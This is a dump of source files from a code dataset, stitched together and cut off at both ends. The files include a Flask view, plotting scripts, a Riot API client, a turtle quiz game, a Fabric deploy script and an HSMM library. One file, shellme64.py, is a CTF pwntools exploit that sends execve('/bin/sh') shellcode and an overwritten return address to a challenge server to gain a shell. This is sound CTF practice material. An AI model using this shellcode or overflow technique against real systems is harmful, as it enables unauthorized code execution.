self.thread.started.connect(self.scanner.doScan)\n self.scanner.finished.connect(self.thread.quit)\n # self.scanner.finished.connect(self.thread.deleteLater)\n self.thread.finished.connect(self.scanner.deleteLater)\n self.scanner.newPort.connect(self.onNewPort)\n self.thread.start()\n self.listeners = []\n\n def onNewPort(self, portName):\n listener = Listener(portName, self)\n listener.start()\n\n\nif __name__ == '__main__':\n import sys\n\n app = QCoreApplication(sys.argv)\n thread = Manager()\n sys.exit(app.exec_())\n","sub_path":"temp/46852457.py","file_name":"46852457.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559840387","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\ncontext.log_level = 'debug'\n\ndef get_shellcode():\n # Reference: https://www.exploit-db.com/exploits/41883\n sc = b\"\"\n sc += b\"\\x48\\x31\\xff\\x48\\x31\\xf6\\x48\\x31\\xd2\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\xb0\\x3b\\x0f\\x05\"\n return sc\n\ndef generate_payload(stack_addr):\n sc = get_shellcode()\n\n payload = b\"\"\n payload += sc\n payload += b\"A\"*(40 - len(sc))\n payload += p64(stack_addr) # rip \n return payload\n\ndef main():\n #target = process(\"./shellme64\")\n target = remote(\"chal.tuctf.com\", 30507)\n\n target.recvuntil(\"Hey! I think you dropped this\\n\")\n\n leaked_stack_addr = int(target.recvline().rstrip().decode(\"utf-8\"), 16)\n print(leaked_stack_addr)\n print(type(leaked_stack_addr))\n\n prompt = target.recvuntil(b\"> \")\n\n payload = generate_payload(leaked_stack_addr)\n print(payload)\n target.sendline(payload)\n\n target.interactive()\n\nmain()\n","sub_path":"2019/tuctf19/pwn/shellme64/shellme64.py","file_name":"shellme64.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51107005","text":"from flask import Blueprint, abort, request, flash, redirect, url_for, \\\n render_template\nfrom flask_login import current_user\nfrom flask_babel import _ # gettext\n\nfrom app import db\nfrom app.models import CommitteeRevision, Page, Group, User, \\\n NavigationEntry, PagePermission\nfrom app.utils import ModuleAPI, NavigationAPI\nfrom app.forms import CommitteeForm\nfrom app.utils.forms import flash_form_errors\nimport app.utils.committee as CommitteeAPI\n\nblueprint = Blueprint('committee', __name__)\n\n\n@blueprint.route('/commissie/', methods=['GET'])\ndef list():\n revisions = CommitteeAPI.get_alphabetical()\n return render_template('committee/list.htm', revisions=revisions)\n\n\n@blueprint.route('/edit/commissie/', methods=['GET', 'POST'])\ndef edit_committee(committee=''):\n if not ModuleAPI.can_write('committee'):\n return abort(403)\n\n path = 'commissie/' + committee\n\n page = Page.get_by_path(path)\n\n form = request.form\n if page:\n revision = page.get_latest_revision()\n form = CommitteeForm(form, revision)\n else:\n revision = None\n form = CommitteeForm()\n\n try:\n url_group_id = int(request.args.get('group_id', None))\n except:\n url_group_id = None\n\n form.group_id.choices = [(group.id, group.name) for group in\n Group.query.order_by(Group.name).all()]\n\n if len(request.form) == 0:\n if revision:\n selected_group_id = revision.group_id\n elif url_group_id is not None:\n selected_group_id = url_group_id\n else:\n selected_group_id = form.group_id.choices[0][0]\n else:\n selected_group_id = int(form.group_id.data)\n\n form.group_id.data = selected_group_id\n\n selected_group = Group.query.get(selected_group_id)\n form.coordinator_id.choices = [\n (user.id, user.name) for user in\n selected_group.users.order_by(User.first_name, User.last_name).all()]\n\n form.nl_title.data = selected_group.name\n\n if form.validate_on_submit():\n committee_nl_title = form.nl_title.data.strip()\n committee_en_title = form.en_title.data.strip()\n\n if not page:\n root_entry_url = url_for('committee.list').rstrip('/')\n root_entry = NavigationEntry.query\\\n .filter(NavigationEntry.url == root_entry_url)\\\n .first()\n\n # Check whether the root navigation entry exists.\n if not root_entry:\n last_root_entry = NavigationEntry.query\\\n .filter(NavigationEntry.parent_id == None)\\\n .order_by(NavigationEntry.position.desc()).first() # noqa\n\n root_entry_position = 1\n if last_root_entry:\n root_entry_position = last_root_entry.position + 1\n\n root_entry = NavigationEntry(\n None, 'Commissies', 'Committees', root_entry_url, False,\n False, root_entry_position)\n\n db.session.add(root_entry)\n db.session.commit()\n\n page = Page(path, 'committee')\n\n # Never needs paid.\n page.needs_paid = False\n\n # Create a navigation entry for the new committee.\n last_navigation_entry = NavigationEntry.query\\\n .filter(NavigationEntry.parent_id == root_entry.id)\\\n .first()\n\n entry_position = 1\n if last_navigation_entry:\n entry_position = last_navigation_entry.position + 1\n\n navigation_entry = NavigationEntry(\n root_entry, committee_nl_title, committee_en_title, '/' + path,\n False, False, entry_position)\n\n db.session.add(navigation_entry)\n db.session.commit()\n\n # Sort these navigation entries.\n NavigationAPI.alphabeticalize(root_entry)\n\n # Assign the navigation entry to the new page (committee).\n page.navigation_entry_id = navigation_entry.id\n\n db.session.add(page)\n db.session.commit()\n\n # Assign read rights to all, and edit rights to BC.\n all_group = Group.query.filter(Group.name == 'all').first()\n bc_group = Group.query.filter(Group.name == 'BC').first()\n\n all_entry = PagePermission(all_group.id, page.id, 1)\n bc_entry = PagePermission(bc_group.id, page.id, 2)\n\n db.session.add(all_entry)\n db.session.add(bc_entry)\n db.session.commit()\n else:\n # If the committee's title has changed, the navigation needs to be\n # updated. Look for the entry, compare the titles, and change where\n # necessary.\n entry = NavigationEntry.query\\\n .filter(NavigationEntry.url == '/' + path).first()\n if entry.title != committee_nl_title:\n entry.title = committee_nl_title\n db.session.add(entry)\n db.session.commit()\n\n group_id = int(form.group_id.data)\n coordinator_id = int(form.coordinator_id.data)\n\n # Add coordinator to BC\n bc_group = Group.query.filter(Group.name == \"BC\").first()\n if bc_group is not None:\n new_coordinator = User.query.filter(\n User.id == coordinator_id).first()\n bc_group.add_user(new_coordinator)\n\n new_revision = CommitteeRevision(\n page, committee_nl_title, committee_en_title,\n form.comment.data.strip(), current_user.id,\n form.nl_description.data.strip(), form.en_description.data.strip(),\n group_id, coordinator_id, form.interim.data)\n\n db.session.add(new_revision)\n db.session.commit()\n\n flash(_('The committee has been saved.'), 'success')\n\n return redirect(url_for('page.get_page', path=path))\n else:\n flash_form_errors(form)\n\n return render_template('committee/edit.htm', page=page,\n form=form, path=path)\n","sub_path":"app/views/committee.py","file_name":"committee.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426211183","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\nN=14\ntol = -8\nexact_energy = np.load(\"./pxp,0th_order,e,\"+str(N)+\".npy\")\nexact_overlap = np.load(\"./pxp,0th_order,LW_overlap,\"+str(N)+\".npy\")\nfsa_energy = np.load(\"./pxp,LW_fsa,0th_order,e,\"+str(N)+\".npy\")\nfsa_overlap = np.load(\"./pxp,LW_fsa,0th_order,LW_overlap,\"+str(N)+\".npy\")\nto_del=[]\nfor n in range(0,np.size(exact_overlap,axis=0)):\n if exact_overlap[n] < tol:\n to_del = np.append(to_del,n)\nfor n in range(np.size(to_del,axis=0)-1,-1,-1):\n exact_overlap=np.delete(exact_overlap,to_del[n])\n exact_energy=np.delete(exact_energy,to_del[n])\n \nplt.scatter(exact_energy,exact_overlap)\nplt.scatter(fsa_energy,fsa_overlap,marker=\"x\",color=\"red\",s=100)\nplt.xlabel(r\"$E$\")\nplt.ylabel(r\"$\\log(\\vert \\langle E \\vert H^z, LW \\rangle \\vert^2)$\")\nplt.show()\n\nexact_energy = np.load(\"./pxp,1st_order,e,\"+str(N)+\".npy\")\nexact_overlap = np.load(\"./pxp,1st_order,LW_overlap,\"+str(N)+\".npy\")\nfsa_energy = np.load(\"./pxp,LW_fsa,1st_order,e,\"+str(N)+\".npy\")\nfsa_overlap = np.load(\"./pxp,LW_fsa,1st_order,LW_overlap,\"+str(N)+\".npy\")\nto_del=[]\nfor n in range(0,np.size(exact_overlap,axis=0)):\n if exact_overlap[n] a')\n return [i.get('href') for i in items]\n\n\ndef get_archive_name(volume, index: int = None):\n return 'vol_{:0>3}'.format(index)\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n volume_id = re.search('/chapter/[^/]+/(\\d+)', volume)\n params = [\n 'device%5Fid=3',\n # 'page={}',\n 'manga%5Fid={}'.format(volume_id.groups()[0]),\n 'loadermax=1',\n ]\n\n uri = '{}/manga/get_manga_url?'.format(domainUri)\n uri += '&'.join(params)\n\n n = 0\n _img_index = 0\n while n < 199:\n\n _img_index += 1\n content = get('{}&page={}'.format(uri, n)).encode()\n\n parser = document_fromstring(content).cssselect('ImageLoader')\n\n if not len(parser):\n break\n\n t = MultiThreads()\n\n for i in parser:\n img_url = i.get('url')\n if img_url.find('blankpage.jpg') > 0:\n break\n # see manga.py:280\n t.addThread(download_one_file, (img_url,))\n # safe_downloader(img_url, path.join(temp_root_path, 'img_{:0>3}.jpg'.format(_img_index)))\n t.startAll()\n\n n += 2\n\n return [-1]\n\n \"\"\"\n curl 'https://www.viz.com/manga/get_manga_url?device%5Fid=3&page=16&manga%5Fid=6098&loadermax=1' -H 'x-requested-with: ShockwaveFlash/27.0.0.130' -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/47.0.2631.55' -H 'authority: www.viz.com' -H 'referer: https://www.viz.com/shonenjump/chapter/claymore-chapter-7/6098?read=1' --compressed\n \"\"\"\n\n\ndef get_manga_name(url, get=None):\n name = re.search('\\\\.com/shonenjump/chapters/([^/]+)', url)\n if not name:\n return UrlParseError()\n return name.groups()[0]\n \"\"\"\n :param url: str\n :param get: request.get\n :return: str\n \"\"\"\n pass\n\n\ndownload_one_file = lambda x: x\n","sub_path":"providers/viz_com.py","file_name":"viz_com.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96444006","text":"'''a=10\r\nb=20\r\nc=a*b\r\nMul = \"the mulitple of {0} and {1} is {2}\".format(10,34,10*34)\r\nprint(Mul)\r\n'''\r\n'''s1=input(\"Enter first string:\")\r\ns2=input(\"Enter Second string:\") \r\nif s1==s2:\r\n print(\"Both strings are equal\") \r\nelif s1 str:\n\t\tregion = config.get_region()\n\t\tbase = \"https://%s.api.riotgames.com\" % region\n\t\treturn base + url\n\n\tdef set_query(self, query_name: str, queries: Union[str, Iterable]) -> 'RiotURL':\n\t\tnew_queries = []\n\t\tif type(queries) is str:\n\t\t\tnew_queries = [queries]\n\t\tfor query in queries:\n\t\t\tnew_queries.append(str(query))\n\t\tself.queries[query_name] = new_queries\n\t\treturn self\n\n\tdef get_url_with_query(self) -> str:\n\t\tfinal_url = self.url\n\t\tfirst = True\n\t\tfor query_name in self.queries.keys():\n\t\t\tif first:\n\t\t\t\tfinal_url += '?'\n\t\t\t\tfirst = False\n\t\t\telse:\n\t\t\t\tfinal_url += '&'\n\t\t\tfinal_url += \"%s=%s\" % (query_name, ','.join(self.queries[query_name]))\n\t\treturn final_url\n\n\tdef request(self, max_retry: int = 5) -> Union[None, Dict]:\n\t\tself.set_query('api_key', config.get_key())\n\t\turl = self.get_url_with_query()\n\n\t\twhile max_retry > 0:\n\t\t\tr = requests.get(url)\n\n\t\t\tif r.status_code == 200:\n\t\t\t\treturn r.json()\n\t\t\telif r.status_code == 404:\n\t\t\t\tlogging.warning(\"Data not found: %s\" % url)\n\t\t\t\treturn None\n\t\t\telif r.status_code == 429:\n\t\t\t\tbackoff = r.headers.get('Retry-After')\n\t\t\t\tif backoff is None:\n\t\t\t\t\tlogging.warning(\"Code 429 with no Retry-After.\")\n\t\t\t\t\tlogging.warning(r.headers)\n\t\t\t\t\tbackoff = 30\n\t\t\t\tbackoff = int(backoff)\n\t\t\t\tlogging.info(\"Backoff for %d seconds.\" % backoff)\n\t\t\t\ttime.sleep(backoff)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tlogging.error(url)\n\t\t\t\tlogging.error(r.json().get('status'))\n\n\t\t\t\tif r.status_code == 401:\n\t\t\t\t\tlogging.error(\"API token is not included.\")\n\t\t\t\t\traise NotReachableError\n\t\t\t\telif r.status_code == 403:\n\t\t\t\t\tlogging.error(\"API token or URL is not valid.\")\n\t\t\t\t\traise KeyNotValidError\n\t\t\t\telse:\n\t\t\t\t\tlogging.error(\"Unknown error of code %d. Retrying.\" % r.status_code)\n\t\t\t\t\tmax_retry -= 1\n\t\t\t\t\tcontinue\n\n\t\treturn None\n","sub_path":"api/riot_api.py","file_name":"riot_api.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198601579","text":"'''\n Merge Sort\n'''\ndef merge_sort(unsorted_list):\n if len(unsorted_list) <= 1:\n return unsorted_list\n\n middle = len(unsorted_list) // 2\n leftlist = unsorted_list[:middle]\n rightlist = unsorted_list[middle:]\n\n leftlist = merge_sort(leftlist)\n rightlist = merge_sort(rightlist)\n return list(merge(leftlist,rightlist))\n\n\ndef merge(left_half,right_half):\n res = []\n while len(left_half) != 0 and len(right_half) != 0:\n if left_half[0] < right_half[0]:\n res.append(left_half[0])\n left_half.remove(left_half[0])\n else:\n res.append(right_half[0])\n right_half.remove(right_half[0])\n\n if len(left_half) == 0:\n res = res + right_half\n else:\n res = res + left_half\n return res\n\n\nlist1 = [5,2,15,8,65]\nlist1 = merge_sort(list1)\nprint(list1)","sub_path":"collegeExercise/SortingPrograms/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246127822","text":"import pandas\nimport turtle\nimport unidecode\n\nscreen = turtle.Screen()\nscreen.title(\"Lietuvos miestų žaidimas\")\nscreen.setup(width=0.99, height=0.99, startx=0, starty=0)\n\ncanvas = screen.getcanvas()\nroot = canvas.winfo_toplevel()\nroot.overrideredirect(1)\n\nimage = \"100 days of code//day 25//lietuvos miestai//lietuvos-žemėlapis-vektorius.gif\"\n\nscreen.addshape(image)\nturtle.shape(image)\n\ndata = pandas.read_csv(\"100 days of code//day 25//lietuvos miestai//50_lietuvos_miestu_pagal_populiacija.csv\")\nall_cities = data.city.to_list()\n# print(data[\"y\"])\n# print(all_cities)\nguessed_cities = []\n\nwhile len(guessed_cities) < 50:\n # def get_mouse_click_coor(x, y):\n # print(x, y)\n\n # turtle.onscreenclick(get_mouse_click_coor)\n\n # turtle.mainloop()\n\n answer_city = screen.textinput(title = f\"{len(guessed_cities)}/50 miestų su didžiausia populiacija\", \n prompt = \"Norint išeiti įveskite 'Baigiau'. Miesto pavadinimas:\").title()\n unidecode.unidecode(answer_city)\n if answer_city == \"Baigiau\":\n cities_left = []\n for city in all_cities:\n if city not in guessed_cities:\n cities_left.append(city)\n df = pandas.DataFrame(cities_left, columns = ['city'])\n df.to_csv(\"100 days of code//day 25//lietuvos miestai//likę_miestai.csv\")\n break\n if answer_city in all_cities and answer_city not in guessed_cities:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n city_data = data[data.city == answer_city]\n print(city_data.x)\n t.goto(int(city_data.x), int(city_data.y))\n t.color(\"black\")\n t.write(answer_city, font = ('Arial', 12, 'normal', 'bold'))\n\n guessed_cities.append(answer_city)\n \n \n\n# If guessed all\nif len(guessed_cities) == 50:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n t.color(\"red\")\n t.goto(-150, 250)\n t.write(\"Atspėjote visus\", font = ('Arial', 48, 'normal', 'bold'))\n \n # screen.mainloop()\n# xcor = data[\"x\"]\n# xc = xcor.to_string(index = False)\n\n# ycor = data[\"y\"]\n# yc = ycor.to_string(index = False)\n\n# print(\"Yes\")\n# turtle.penup()\n# turtle.goto(xc, yc)\n# turtle.write(answer_city, align = \"center\")\n\n# screen.exitonclick()","sub_path":"100 days of code/day 25/lietuvos miestai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334387496","text":"# -*- coding: utf-8 -*-\r\n#\r\n# AUTHOR = PAUL KEARNEY \r\n# STUDENT ID = G00364787\r\n# DATE = 2018-03-02\r\n# EXERCISE05\r\n# A script to...\r\n# Write a Python script that reads the Iris data set in and prints the four numerical \r\n# values on each row in a nice format. That is, on the screen should be printed the \r\n# petal length, petal width, sepal length and sepal width, and these values should \r\n# have the decimal places aligned, with a space between the columns.\r\n# \r\n# all own work and with help from references\r\n#\r\n# references used:\r\n# https://docs.python.org/2/library/csv.html\r\n# accessed: 2-mar-2018\r\n#\r\n# https://pythonprogramming.net/reading-csv-files-python-3/\r\n# accessed: 2 mar 2018\r\n# \r\n# https://stackoverflow.com/questions/8234445/python-format-output-string-right-alignment\r\n# accessed: 2 mar 2018\r\n#\r\n# http://www.tutorialspoint.com/python/string_rjust.htm\r\n# accessed: 2 mar 2018\r\n#\r\n# http://www.tutorialspoint.com/python/string_rjust.htm\r\n# accessed: 2 mar 2018\r\n#\r\nimport csv\r\n#\r\n# setup the required data for the progam to run\r\nfilename = \"iris.csv\"\r\ndelim = \",\"\r\nindex = 0;\r\n\r\nfield = \"\"\r\n\r\nprint(\"# Program is running...\")\r\nwith open(filename) as csvfile:\r\n print(\"# Opening: \",filename)\r\n readCSV = csv.reader(csvfile, delimiter=delim)\r\n for field in readCSV:\r\n if (len(field) >0 ):\r\n # build up the ouptut string before printing to screen.\r\n opStr = field[0].rjust(3,\" \") + \" \" + field[1].rjust(3,\" \")\r\n opStr = opStr + \" \" + field[2].rjust(3,\" \") + \" \" + field[3].rjust(3,\" \")\r\n print( opStr )\r\n print(\"# End of file\")\r\nprint(\"# Program is finished.\")\r\n\r\n","sub_path":"gmit--exercise05--reading-csv-file--code--20180303a.py","file_name":"gmit--exercise05--reading-csv-file--code--20180303a.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541909792","text":"from fabric.contrib.files import exists, sed\nfrom fabric.api import env, local, prefix, run\n\n\nclass Deployment(object):\n\n # project settings\n PROJECT_NAME = 'sales_rank_spider'\n\n PRODUCTION_USER = 'salesranktable'\n STAGING_USER = 'cfc'\n\n # static settings\n BASE_HOST_STRING = '%s@ssh.pythonanywhere.com'\n BASE_REPO_URL = 'git@github.com:cfc603/%s'\n\n def __init__(self, live):\n self.live = live\n self.set_env_user()\n self.set_env_host_string()\n self.deploy()\n\n def deploy(self):\n self.create_project_folder()\n self.create_source_folder()\n self.get_latest_source()\n self.set_host_settings()\n self.update_virtualenv()\n\n @property\n def host_string(self):\n if not hasattr(self, '_host_string'):\n self._host_string = self.BASE_HOST_STRING % (self.user)\n return self._host_string\n\n @property\n def live(self):\n return self._live\n\n @live.setter\n def live(self, value):\n if value == 'True':\n self._live = True\n elif value == 'False':\n self._live = False\n else:\n raise AttributeError('True or False was not given.')\n\n @property\n def project_folder(self):\n if not hasattr(self, '_project_folder'):\n self._project_folder = '/home/%s/spiders/%s' % (\n self.user, self.PROJECT_NAME\n )\n return self._project_folder\n\n @property\n def repo_url(self):\n if not hasattr(self, '_repo_url'):\n self._repo_url = self.BASE_REPO_URL % (self.PROJECT_NAME)\n return self._repo_url\n\n @property\n def source_folder(self):\n if not hasattr(self, '_source_folder'):\n self._source_folder = '%s/source' % (self.project_folder)\n return self._source_folder\n\n @property\n def user(self):\n if not hasattr(self, '_user'):\n if self.live:\n self._user = self.PRODUCTION_USER\n else:\n self._user = self.STAGING_USER\n return self._user\n\n @property\n def virtualenv_folder(self):\n if not hasattr(self, '_virtualenv_folder'):\n self._virtualenv_folder = '/home/%s/.virtualenvs/%s' % (\n self.user, self.PROJECT_NAME\n )\n return self._virtualenv_folder\n\n def create_project_folder(self):\n if not exists(self.project_folder):\n run('mkdir -p %s' % (self.project_folder))\n\n def create_source_folder(self):\n if not exists(self.source_folder):\n run('mkdir -p %s' % (self.source_folder))\n\n def get_latest_source(self):\n if exists('%s/.git' % (self.source_folder)):\n run('cd %s && git fetch' % (self.source_folder,))\n else:\n run('git clone %s %s' % (self.repo_url, self.source_folder))\n\n current_commit = local(\"git log -n 1 --format=%H\", capture=True)\n run('cd %s && git reset --hard %s' % (\n self.source_folder, current_commit\n ))\n\n def set_env_host_string(self):\n env.host_string = self.host_string\n\n def set_env_user(self):\n env.user = self.user\n\n def set_host_settings(self):\n scrapy_cfg_path = '%s/scrapy.cfg' % (self.source_folder)\n\n if self.live:\n setting_location = 'default = sales_rank_spider.settings.production'\n else:\n setting_location = 'default = sales_rank_spider.settings.staging'\n\n sed(\n scrapy_cfg_path,\n 'default = sales_rank_spider.settings',\n setting_location\n )\n\n def update_virtualenv(self):\n if not exists('%s/bin/pip' % (self.virtualenv_folder)):\n run('mkvirtualenv %s' % (self.PROJECT_NAME))\n\n with prefix('workon %s' % (self.PROJECT_NAME)):\n run('pip install -r %s/requirements.txt' % (self.source_folder))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68222501","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom tempfile import TemporaryDirectory\n\nimport skeletonization\nimport skeletonization.doc_utils as docs\n\nROOT_SKELETONIZATION_DIR = os.path.dirname(os.path.dirname(skeletonization.__file__))\n\n\"\"\"Generate Sphinx documentation for the skeletonization module\"\"\"\nDOCS_FOLDER = os.path.join(ROOT_SKELETONIZATION_DIR, \"docs\")\nDOC_WARNING_RATCHET = 200\n\n\ndef main():\n \"\"\"\n Generate Sphinx docs for the skeletonization module.\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Generate sphinx documentation\")\n parser.add_argument(\n \"--output_folder\",\n help=\"\"\"The folder to output the html documentation tree into.\n If unspecified the docs will be only be generated to check\n for errors/warnings.\"\"\",\n type=str)\n\n docs.build_api_docs(\n os.path.join(ROOT_SKELETONIZATION_DIR, \"\"),\n os.path.join(DOCS_FOLDER, \"api_python\"))\n\n args = parser.parse_args()\n\n with TemporaryDirectory() as td:\n output = args.output_folder if (args.output_folder is not None) else td\n warning_count = docs.build_html_docs(DOCS_FOLDER, output)\n\n print(\"Documentation written to: {}\", output)\n few_enough_warnings = warning_count <= DOC_WARNING_RATCHET\n print(\n \"Documentation Build Test: {} ({}/{})\",\n \"PASSED\" if few_enough_warnings else \"FAILED\",\n warning_count,\n DOC_WARNING_RATCHET)\n\n return 0 if few_enough_warnings else 1\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_sphinx_documentation.py","file_name":"run_sphinx_documentation.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"171831784","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\nfrom scipy.special import logsumexp\nfrom sklearn import cluster\nfrom sklearn.utils import check_array, check_random_state\n\nfrom . import hsmm_core_x as core, hsmm_utils\nfrom .hsmm_utils import log_mask_zero, iter_from_X_lengths\n\n# Base Class for Explicit Duration HSMM\nclass HSMM:\n def __init__(self, n_states=2, n_durations=5, n_iter=20, tol=1e-2, rnd_state=None):\n if not n_states >= 2:\n raise ValueError(\"number of states (n_states) must be at least 2\")\n if not n_durations >= 1:\n raise ValueError(\"number of durations (n_durations) must be at least 1\")\n self.n_states = n_states\n self.n_durations = n_durations\n self.n_iter = n_iter\n self.tol = tol\n self.rnd_state = rnd_state\n\n # _init: initializes model parameters if there are none yet\n def _init(self):\n if not hasattr(self, \"pi\"):\n self.pi = np.full(self.n_states, 1.0 / self.n_states)\n if not hasattr(self, \"tmat\"):\n self.tmat = np.full((self.n_states, self.n_states), 1.0 / (self.n_states - 1))\n for i in range(self.n_states):\n self.tmat[i, i] = 0.0 # no self-transitions in EDHSMM\n self._dur_init() # duration\n\n # _check: check if properties of model parameters are satisfied\n def _check(self):\n # starting probabilities\n self.pi = np.asarray(self.pi)\n if self.pi.shape != (self.n_states, ):\n raise ValueError(\"start probabilities (self.pi) must have shape ({},)\".format(self.n_states))\n if not np.allclose(self.pi.sum(), 1.0):\n raise ValueError(\"start probabilities (self.pi) must add up to 1.0\")\n # transition probabilities\n self.tmat = np.asarray(self.tmat)\n if self.tmat.shape != (self.n_states, self.n_states):\n raise ValueError(\"transition matrix (self.tmat) must have shape ({0}, {0})\".format(self.n_states))\n if not np.allclose(self.tmat.sum(axis=1), 1.0):\n raise ValueError(\"transition matrix (self.tmat) must add up to 1.0\")\n for i in range(self.n_states):\n if self.tmat[i, i] != 0.0: # check for diagonals\n raise ValueError(\"transition matrix (self.tmat) must have all diagonals equal to 0.0\")\n # duration probabilities\n self._dur_check()\n\n # _dur_init: initializes duration parameters if there are none yet\n def _dur_init(self):\n \"\"\"\n arguments: (self)\n return: None\n > initialize the duration parameters\n \"\"\"\n pass # implemented in subclass\n \n # _dur_check: checks if properties of duration parameters are satisfied\n def _dur_check(self):\n \"\"\"\n arguments: (self)\n return: None\n > check the duration parameters\n \"\"\"\n pass # implemented in subclass\n \n # _dur_probmat: compute the probability per state of each duration\n def _dur_probmat(self):\n \"\"\"\n arguments: (self)\n return: duration probability matrix\n \"\"\"\n pass # implemented in subclass\n\n # _dur_mstep: perform m-step for duration parameters\n def _dur_mstep(self):\n \"\"\"\n arguments: (self, new_dur)\n return: None\n > compute the duration parameters\n \"\"\"\n pass # implemented in subclass\n\n # _emission_logprob: compute the log-likelihood per state of each observation\n def _emission_logprob(self):\n \"\"\"\n arguments: (self, X)\n return: logframe\n \"\"\"\n pass # implemented in subclass\n\n # _emission_pre_mstep: prepare m-step for emission parameters\n def _emission_pre_mstep(self):\n \"\"\"\n arguments: (self, gamma, emission_var)\n return: None\n > process gamma and save output to emission_var\n \"\"\"\n pass # implemented in subclass\n\n # _emission_mstep: perform m-step for emission parameters\n def _emission_mstep(self):\n \"\"\"\n arguments: (self, X, emission_var)\n return: None\n > compute the emission parameters\n \"\"\"\n pass # implemented in subclass\n\n # _state_sample: generate 'observation' for given state\n def _state_sample(self):\n \"\"\"\n arguments: (self, state, rnd_state=None)\n return: np.ndarray of length equal to dimension of observation\n > generate sample from state\n \"\"\"\n pass # implemented in subclass\n\n # sample: generate random observation series\n def sample(self, n_samples=5, censoring=1, rnd_state=None):\n # self._init(None) # see \"note for programmers\" in init() in GaussianHSMM\n self._check()\n # setup random state\n if rnd_state is None:\n rnd_state = self.rnd_state\n rnd_checked = check_random_state(rnd_state)\n # adapted from hmmlearn 0.2.3 (see _BaseHMM.score function)\n pi_cdf = np.cumsum(self.pi)\n tmat_cdf = np.cumsum(self.tmat, axis=1)\n dur_cdf = np.cumsum(self._dur_probmat(), axis=1)\n # for first state\n currstate = (pi_cdf > rnd_checked.rand()).argmax() # argmax() returns only the first occurrence\n currdur = (dur_cdf[currstate] > rnd_checked.rand()).argmax() + 1\n if censoring == 0 and currdur > n_samples:\n print(\"SAMPLE: n_samples is too small to contain the first state duration.\")\n return None\n state_sequence = [currstate] * currdur\n X = [self._state_sample(currstate, rnd_checked) for i in range(currdur)] # generate 'observation'\n ctr_sample = currdur\n # for next state transitions\n while ctr_sample < n_samples:\n currstate = (tmat_cdf[currstate] > rnd_checked.rand()).argmax()\n currdur = (dur_cdf[currstate] > rnd_checked.rand()).argmax() + 1\n # test if now in the end of generating samples\n if ctr_sample + currdur > n_samples:\n if censoring == 0:\n break # if without right censoring, do not include exceeding state duration\n else:\n currdur = n_samples - ctr_sample # if with right censoring, cap the samples to n_samples\n state_sequence += [currstate] * currdur\n X += [self._state_sample(currstate, rnd_checked) for i in range(currdur)] # generate 'observation'\n ctr_sample += currdur\n return ctr_sample, np.atleast_2d(X), np.array(state_sequence, dtype=int)\n\n # _core_u_only: container for core._u_only (for multiple observation sequences)\n def _core_u_only(self, logframe):\n n_samples = logframe.shape[0]\n u = np.empty((n_samples, self.n_states, self.n_durations))\n core._u_only(n_samples, self.n_states, self.n_durations,\n logframe, u)\n return u\n\n # _core_forward: container for core._forward (for multiple observation sequences)\n def _core_forward(self, u, logdur, censoring):\n n_samples = u.shape[0]\n if censoring == 0: # without right censoring\n eta = np.empty((n_samples, self.n_states, self.n_durations))\n else: # with right censoring\n eta = np.empty((n_samples + self.n_durations - 1, self.n_states, self.n_durations))\n xi = np.empty((n_samples, self.n_states, self.n_states))\n core._forward(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, eta, u, xi)\n return eta, xi\n\n # _core_backward: container for core._backward (for multiple observation sequences)\n def _core_backward(self, u, logdur, censoring):\n n_samples = u.shape[0]\n beta = np.empty((n_samples, self.n_states))\n betastar = np.empty((n_samples, self.n_states))\n core._backward(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, beta, u, betastar)\n return beta, betastar\n \n # _core_smoothed: container for core._smoothed (for multiple observation sequences)\n def _core_smoothed(self, beta, betastar, censoring, eta, xi):\n n_samples = beta.shape[0]\n gamma = np.empty((n_samples, 